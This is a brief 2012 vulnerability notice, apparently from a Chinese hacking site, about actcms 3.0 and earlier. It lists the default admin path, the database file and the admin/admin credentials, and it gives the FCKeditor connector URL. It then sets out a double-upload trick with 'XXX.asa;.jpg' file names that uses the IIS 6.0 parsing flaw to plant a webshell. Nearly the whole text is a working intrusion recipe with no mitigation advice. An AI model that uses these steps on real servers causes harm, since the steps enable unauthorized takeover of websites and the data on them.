actcms website management system vulnerability 0day-vulnerability warning-the black bar safety net

ID MYHACK58:62201234020
Type myhack58
Reporter 佚名
Modified 2012-06-01T00:00:00


Author: Liuker

Vulnerability version: actcms3. 0 the following version

The default background path: admin/

Default database: App_Data/DataBase. mdb

Default account: admin

The default password is: admin

Use: FCK compiler

Vulnerability interface:

admin/fckeditor/editor/filemanager/browser/default/browser. html? Type=Image&Connector=%2Fadmin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector. aspx

Using FCK 2 times to upload

You can upload XXX. asa;. jpg type

After uploading turns into XXX_asa;. jpg

Again upload XXX. asa;. jpg

You can become a XXX. asa;(1). jpg

Using IIS6. 0 parsing vulnerability you can get a webshell